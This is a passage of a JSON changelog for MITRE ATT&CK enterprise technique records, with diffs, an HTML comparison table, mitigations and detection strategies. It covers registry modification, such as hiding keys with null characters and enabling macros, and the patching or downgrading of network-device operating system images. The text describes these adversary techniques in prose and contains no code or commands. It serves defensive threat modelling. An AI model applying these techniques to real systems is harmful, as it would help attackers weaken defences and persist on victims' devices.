Jun 2022)(Citation: CISA Russian Gov Critical Infra 2018) The Registry may also be modified to [Impair Defenses](https://attack.mitre.org/techniques/T1562), such as by enabling macros for all Microsoft Office products, allowing privilege escalation without alerting the user, increasing the maximum number of allowed outbound requests, and/or modifying systems to store plaintext credentials in memory.(Citation: CISA LockBit 2023)(Citation: Unit42 BabyShark Feb 2019)\\n+The Registry may be modified in order to hide configuration information or malicious payloads via [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).(Citation: Unit42 BabyShark Feb 2019)(Citation: Avaddon Ransomware 2021)(Citation: Microsoft BlackCat Jun 2022)(Citation: CISA Russian Gov Critical Infra 2018) The Registry may also be modified to impair defenses, such as by enabling macros for all Microsoft Office products, allowing privilege escalation without alerting the user, increasing the maximum number of allowed outbound requests, and/or modifying systems to store plaintext credentials in memory.(Citation: CISA LockBit 2023)(Citation: Unit42 BabyShark Feb 2019)\\n \\n The Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system.(Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.\\n \"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"defense-impairment\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.0\"}}, \"iterable_item_removed\": {\"root['external_references'][7]\": {\"source_name\": \"Microsoft 4657 APR 2017\", \"description\": \"Miroshnikov, A. & Hall, J. (2017, April 18). 4657(S): A registry value was modified. Retrieved August 9, 2018.\", \"url\": \"https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4657\"}, \"root['external_references'][10]\": {\"source_name\": \"Microsoft RegDelNull July 2016\", \"description\": \"Russinovich, M. & Sharkey, K. (2016, July 4). RegDelNull v1.11. Retrieved August 10, 2018.\", \"url\": \"https://docs.microsoft.com/en-us/sysinternals/downloads/regdelnull\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 3.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to5__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to5__0\"><a href=\"#difflib_chg_to5__top\">t</a></td><td class=\"diff_header\" id=\"from5_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;interact&nbsp;with&nbsp;the&nbsp;Windows&nbsp;Registry&nbsp;as&nbsp;part&nbsp;o</td><td class=\"diff_next\"><a href=\"#difflib_chg_to5__top\">t</a></td><td class=\"diff_header\" id=\"to5_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;interact&nbsp;with&nbsp;the&nbsp;Windows&nbsp;Registry&nbsp;as&nbsp;part&nbsp;o</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">f&nbsp;a&nbsp;variety&nbsp;of&nbsp;other&nbsp;techniques&nbsp;to&nbsp;aid&nbsp;in&nbsp;defense&nbsp;evasion,&nbsp;p</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">f&nbsp;a&nbsp;variety&nbsp;of&nbsp;other&nbsp;techniques&nbsp;to&nbsp;aid&nbsp;in&nbsp;defense&nbsp;evasion,&nbsp;p</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ersistence,&nbsp;and&nbsp;execution.&nbsp;&nbsp;Access&nbsp;to&nbsp;specific&nbsp;areas&nbsp;of&nbsp;the&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ersistence,&nbsp;and&nbsp;execution.&nbsp;&nbsp;Access&nbsp;to&nbsp;specific&nbsp;areas&nbsp;of&nbsp;the&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Registry&nbsp;depends&nbsp;on&nbsp;account&nbsp;permissions,&nbsp;with&nbsp;some&nbsp;keys&nbsp;requ</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Registry&nbsp;depends&nbsp;on&nbsp;account&nbsp;permissions,&nbsp;with&nbsp;some&nbsp;keys&nbsp;requ</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">iring&nbsp;administrator-level&nbsp;access.&nbsp;The&nbsp;built-in&nbsp;Windows&nbsp;comma</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">iring&nbsp;administrator-level&nbsp;access.&nbsp;The&nbsp;built-in&nbsp;Windows&nbsp;comma</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nd-line&nbsp;utility&nbsp;[Reg](https://attack.mitre.org/software/S007</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nd-line&nbsp;utility&nbsp;[Reg](https://attack.mitre.org/software/S007</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">5)&nbsp;may&nbsp;be&nbsp;used&nbsp;for&nbsp;local&nbsp;or&nbsp;remote&nbsp;Registry&nbsp;modification.(Ci</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">5)&nbsp;may&nbsp;be&nbsp;used&nbsp;for&nbsp;local&nbsp;or&nbsp;remote&nbsp;Registry&nbsp;modification.(Ci</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tation:&nbsp;Microsoft&nbsp;Reg)&nbsp;Other&nbsp;tools,&nbsp;such&nbsp;as&nbsp;remote&nbsp;access&nbsp;to</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tation:&nbsp;Microsoft&nbsp;Reg)&nbsp;Other&nbsp;tools,&nbsp;such&nbsp;as&nbsp;remote&nbsp;access&nbsp;to</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ols,&nbsp;may&nbsp;also&nbsp;contain&nbsp;functionality&nbsp;to&nbsp;interact&nbsp;with&nbsp;the&nbsp;Reg</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ols,&nbsp;may&nbsp;also&nbsp;contain&nbsp;functionality&nbsp;to&nbsp;interact&nbsp;with&nbsp;the&nbsp;Reg</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">istry&nbsp;through&nbsp;the&nbsp;Windows&nbsp;API.&nbsp;&nbsp;The&nbsp;Registry&nbsp;may&nbsp;be&nbsp;modified</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">istry&nbsp;through&nbsp;the&nbsp;Windows&nbsp;API.&nbsp;&nbsp;The&nbsp;Registry&nbsp;may&nbsp;be&nbsp;modified</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;in&nbsp;order&nbsp;to&nbsp;hide&nbsp;configuration&nbsp;information&nbsp;or&nbsp;malicious&nbsp;pay</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;in&nbsp;order&nbsp;to&nbsp;hide&nbsp;configuration&nbsp;information&nbsp;or&nbsp;malicious&nbsp;pay</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">loads&nbsp;via&nbsp;[Obfuscated&nbsp;Files&nbsp;or&nbsp;Information](https://attack.m</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">loads&nbsp;via&nbsp;[Obfuscated&nbsp;Files&nbsp;or&nbsp;Information](https://attack.m</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">itre.org/techniques/T1027).(Citation:&nbsp;Unit42&nbsp;BabyShark&nbsp;Feb&nbsp;2</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">itre.org/techniques/T1027).(Citation:&nbsp;Unit42&nbsp;BabyShark&nbsp;Feb&nbsp;2</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">019)(Citation:&nbsp;Avaddon&nbsp;Ransomware&nbsp;2021)(Citation:&nbsp;Microsoft&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">019)(Citation:&nbsp;Avaddon&nbsp;Ransomware&nbsp;2021)(Citation:&nbsp;Microsoft&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">BlackCat&nbsp;Jun&nbsp;2022)(Citation:&nbsp;CISA&nbsp;Russian&nbsp;Gov&nbsp;Critical&nbsp;Infra</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">BlackCat&nbsp;Jun&nbsp;2022)(Citation:&nbsp;CISA&nbsp;Russian&nbsp;Gov&nbsp;Critical&nbsp;Infra</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;2018)&nbsp;The&nbsp;Registry&nbsp;may&nbsp;also&nbsp;be&nbsp;modified&nbsp;to&nbsp;<span class=\"diff_chg\">[Impair&nbsp;Defenses</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;2018)&nbsp;The&nbsp;Registry&nbsp;may&nbsp;also&nbsp;be&nbsp;modified&nbsp;to&nbsp;<span class=\"diff_chg\">impair&nbsp;defenses,</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">](https://attack.mitre.org/techni</span>ques<span class=\"diff_chg\">/T1562)</span>,&nbsp;<span class=\"diff_chg\">such&nbsp;as&nbsp;by&nbsp;ena</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">&nbsp;such&nbsp;as&nbsp;by&nbsp;enabling&nbsp;macros&nbsp;for&nbsp;all&nbsp;Microsoft&nbsp;Office&nbsp;product</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">bling&nbsp;macros&nbsp;for&nbsp;all&nbsp;Microsoft&nbsp;Office&nbsp;products,&nbsp;allowing&nbsp;pri</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">s,&nbsp;allowing&nbsp;privilege&nbsp;escalation&nbsp;without&nbsp;alerting&nbsp;the&nbsp;user,&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">vilege&nbsp;escalation&nbsp;without&nbsp;alerting&nbsp;the&nbsp;user,&nbsp;increasing&nbsp;the&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">increasing&nbsp;the&nbsp;maximum&nbsp;number&nbsp;of&nbsp;allowed&nbsp;outbound&nbsp;re</span>ques<span class=\"diff_chg\">ts</span>,&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">ma</span>x<span class=\"diff_chg\">imum&nbsp;number&nbsp;of&nbsp;allowed&nbsp;outbound&nbsp;requests,&nbsp;and/or&nbsp;modifyin</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">and/or&nbsp;modifying&nbsp;systems&nbsp;to&nbsp;store&nbsp;plainte</span>x<span class=\"diff_chg\">t&nbsp;credentials&nbsp;in</span>&nbsp;m</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">g&nbsp;systems&nbsp;to&nbsp;store&nbsp;plaintext&nbsp;credentials&nbsp;in</span>&nbsp;memory.(Citation</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">emory.(Citation:&nbsp;CISA&nbsp;LockBit&nbsp;2023)(Citation:&nbsp;Unit42&nbsp;BabySha</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">:&nbsp;CISA&nbsp;LockBit&nbsp;2023)(Citation:&nbsp;Unit42&nbsp;BabyShark&nbsp;Feb&nbsp;2019)&nbsp;&nbsp;T</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rk&nbsp;Feb&nbsp;2019)&nbsp;&nbsp;The&nbsp;Registry&nbsp;of&nbsp;a&nbsp;remote&nbsp;system&nbsp;may&nbsp;be&nbsp;modifie</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">he&nbsp;Registry&nbsp;of&nbsp;a&nbsp;remote&nbsp;system&nbsp;may&nbsp;be&nbsp;modified&nbsp;to&nbsp;aid&nbsp;in&nbsp;exe</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">d&nbsp;to&nbsp;aid&nbsp;in&nbsp;execution&nbsp;of&nbsp;files&nbsp;as&nbsp;part&nbsp;of&nbsp;lateral&nbsp;movement.&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">cution&nbsp;of&nbsp;files&nbsp;as&nbsp;part&nbsp;of&nbsp;lateral&nbsp;movement.&nbsp;It&nbsp;requires&nbsp;the</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">It&nbsp;requires&nbsp;the&nbsp;remote&nbsp;Registry&nbsp;service&nbsp;to&nbsp;be&nbsp;running&nbsp;on&nbsp;the</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;remote&nbsp;Registry&nbsp;service&nbsp;to&nbsp;be&nbsp;running&nbsp;on&nbsp;the&nbsp;target&nbsp;system.</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;target&nbsp;system.(Citation:&nbsp;Microsoft&nbsp;Remote)&nbsp;Often&nbsp;[Valid&nbsp;Acc</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">(Citation:&nbsp;Microsoft&nbsp;Remote)&nbsp;Often&nbsp;[Valid&nbsp;Accounts](https://</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ounts](https://attack.mitre.org/techniques/T1078)&nbsp;are&nbsp;requir</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">attack.mitre.org/techniques/T1078)&nbsp;are&nbsp;required,&nbsp;along&nbsp;with&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ed,&nbsp;along&nbsp;with&nbsp;access&nbsp;to&nbsp;the&nbsp;remote&nbsp;system's&nbsp;[SMB/Windows&nbsp;Ad</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">access&nbsp;to&nbsp;the&nbsp;remote&nbsp;system's&nbsp;[SMB/Windows&nbsp;Admin&nbsp;Shares](htt</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">min&nbsp;Shares](https://attack.mitre.org/techniques/T1021/002)&nbsp;f</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ps://attack.mitre.org/techniques/T1021/002)&nbsp;for&nbsp;RPC&nbsp;communic</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">or&nbsp;RPC&nbsp;communication.&nbsp;&nbsp;Finally,&nbsp;Registry&nbsp;modifications&nbsp;may&nbsp;a</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ation.&nbsp;&nbsp;Finally,&nbsp;Registry&nbsp;modifications&nbsp;may&nbsp;also&nbsp;include&nbsp;act</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">lso&nbsp;include&nbsp;actions&nbsp;to&nbsp;hide&nbsp;keys,&nbsp;such&nbsp;as&nbsp;prepending&nbsp;key&nbsp;nam</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ions&nbsp;to&nbsp;hide&nbsp;keys,&nbsp;such&nbsp;as&nbsp;prepending&nbsp;key&nbsp;names&nbsp;with&nbsp;a&nbsp;null&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">es&nbsp;with&nbsp;a&nbsp;null&nbsp;character,&nbsp;which&nbsp;will&nbsp;cause&nbsp;an&nbsp;error&nbsp;and/or&nbsp;b</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">character,&nbsp;which&nbsp;will&nbsp;cause&nbsp;an&nbsp;error&nbsp;and/or&nbsp;be&nbsp;ignored&nbsp;when&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;ignored&nbsp;when&nbsp;read&nbsp;via&nbsp;[Reg](https://attack.mitre.org/softw</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">read&nbsp;via&nbsp;[Reg](https://attack.mitre.org/software/S0075)&nbsp;or&nbsp;o</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">are/S0075)&nbsp;or&nbsp;other&nbsp;utilities&nbsp;using&nbsp;the&nbsp;Win32&nbsp;API.(Citation:</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ther&nbsp;utilities&nbsp;using&nbsp;the&nbsp;Win32&nbsp;API.(Citation:&nbsp;Microsoft&nbsp;Regh</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;Microsoft&nbsp;Reghide&nbsp;NOV&nbsp;2006)&nbsp;Adversaries&nbsp;may&nbsp;abuse&nbsp;these&nbsp;pse</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ide&nbsp;NOV&nbsp;2006)&nbsp;Adversaries&nbsp;may&nbsp;abuse&nbsp;these&nbsp;pseudo-hidden&nbsp;keys</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">udo-hidden&nbsp;keys&nbsp;to&nbsp;conceal&nbsp;payloads/commands&nbsp;used&nbsp;to&nbsp;maintai</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;to&nbsp;conceal&nbsp;payloads/commands&nbsp;used&nbsp;to&nbsp;maintain&nbsp;persistence.(</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">n&nbsp;persistence.(Citation:&nbsp;TrendMicro&nbsp;POWELIKS&nbsp;AUG&nbsp;2014)(Citat</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Citation:&nbsp;TrendMicro&nbsp;POWELIKS&nbsp;AUG&nbsp;2014)(Citation:&nbsp;SpectorOps</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ion:&nbsp;SpectorOps&nbsp;Hiding&nbsp;Reg&nbsp;Jul&nbsp;2017)</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;Hiding&nbsp;Reg&nbsp;Jul&nbsp;2017)</td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [
                            "M1024: Restrict Registry Permissions"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0280: Behavior-Based Registry Modification Detection on Windows"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--ae7f3575-0a5e-427e-991b-fe03ad44c754",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-10-19 19:42:19.740000+00:00",
                    "modified": "2026-04-16 20:07:53.013000+00:00",
                    "name": "Modify System Image",
                    "description": "Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves.  On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.\n\nTo change the operating system, the adversary typically only needs to affect this one file, replacing or modifying it.  This can either be done live in memory during system runtime for immediate effect, or in storage to implement the change on the next boot of the network device.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1601",
                            "external_id": "T1601"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Network Devices"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 20:07:53.013000+00:00\", \"old_value\": \"2025-10-24 17:49:13.730000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"defense-impairment\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}}, \"iterable_item_removed\": {\"root['external_references'][1]\": {\"source_name\": \"Cisco IOS Software Integrity Assurance - Image File Verification\", \"description\": \"Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Image File Verification. Retrieved October 19, 2020.\", \"url\": \"https://tools.cisco.com/security/center/resources/integrity_assurance.html#7\"}, \"root['external_references'][2]\": {\"source_name\": \"Cisco IOS Software Integrity Assurance - Run-Time Memory Verification\", \"description\": \"Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.\", \"url\": \"https://tools.cisco.com/security/center/resources/integrity_assurance.html#13\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1026: Privileged Account Management",
                            "M1027: Password Policies",
                            "M1032: Multi-factor Authentication",
                            "M1043: Credential Access Protection",
                            "M1045: Code Signing",
                            "M1046: Boot Integrity"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0170: Detection Strategy for Modify System Image on Network Devices"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--fc74ba38-dc98-461f-8611-b3dbf9978e3d",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-10-19 19:53:10.576000+00:00",
                    "modified": "2026-04-16 20:07:53.109000+00:00",
                    "name": "Downgrade System Image",
                    "description": "Adversaries may install an older version of the operating system of a network device to weaken security.  Older operating system versions on network devices often have weaker encryption ciphers and, in general, fewer/less updated defensive features. (Citation: Cisco Synful Knock Evolution)\n\nOn embedded devices, downgrading the version typically only requires replacing the operating system file in storage.  With most embedded devices, this can be achieved by downloading a copy of the desired version of the operating system file and reconfiguring the device to boot from that file on next system restart.  The adversary could then restart the device to implement the change immediately or they could wait until the next time the system restarts.\n\nDowngrading the system image to an older versions may allow an adversary to evade defenses by enabling behaviors such as [Weaken Encryption](https://attack.mitre.org/techniques/T1600).  Downgrading of a system image can be done on its own, or it can be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001).  ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1601/002",
                            "external_id": "T1601.002"
                        },
                        {
                            "source_name": "Cisco Synful Knock Evolution",
                            "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.",
                            "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Network Devices"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 20:07:53.109000+00:00\", \"old_value\": \"2025-10-24 17:49:39.331000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"defense-impairment\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1026: Privileged Account Management",
                            "M1027: Password Policies",
                            "M1032: Multi-factor Authentication",
                            "M1043: Credential Access Protection",
                            "M1045: Code Signing",
                            "M1046: Boot Integrity"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0569: Detection Strategy for Downgrade System Image on Network Devices"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--d245808a-7086-4310-984a-a84aaaa43f8f",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-10-19 19:49:24.129000+00:00",
                    "modified": "2026-04-16 20:07:53.106000+00:00",
                    "name": "Patch System Image",
                    "description": "Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses.(Citation: Killing the myth of Cisco IOS rootkits) (Citation: Killing IOS diversity myth) (Citation: Cisco IOS Shellcode) (Citation: Cisco IOS Forensics Developments) (Citation: Juniper Netscreen of the Dead) Some network devices are built with a monolithic architecture, where the entire operating system and most of the functionality of the device is contained within a single file.  Adversaries may change this file in storage, to be loaded in a future boot, or in memory during runtime.\n\nTo change the operating system in storage, the adversary will typically use the standard procedures available to device operators. This may involve downloading a new file via typical protocols used on network devices, such as TFTP, FTP, SCP, or a console connection.  The original file may be overwritten, or a new file may be written alongside of it and the device reconfigured to boot to the compromised image.\n\nTo change the operating system in memory, the adversary typically can use one of two methods. In the first, the adversary would make use of native debug commands in the original, unaltered running operating system that allow them to directly modify the relevant memory addresses containing the running operating system.  This method typically requires administrative level access to the device.\n\nIn the second method for changing the operating system in memory, the adversary would make use of the boot loader. The boot loader is the first piece of software that loads when the device starts that, in turn, will launch the operating system.  Adversaries may use malicious code previously implanted in the boot loader, such as through the [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) method, to directly manipulate running operating system code in memory.  This malicious code in the bootloader provides the capability of direct memory manipulation to the adversary, allowing them to patch the live operating system during runtime.\n\nBy modifying the instructions stored in the system image file, adversaries may either weaken existing defenses or provision new capabilities that the device did not have before. Examples of existing defenses that can be impeded include encryption, via [Weaken 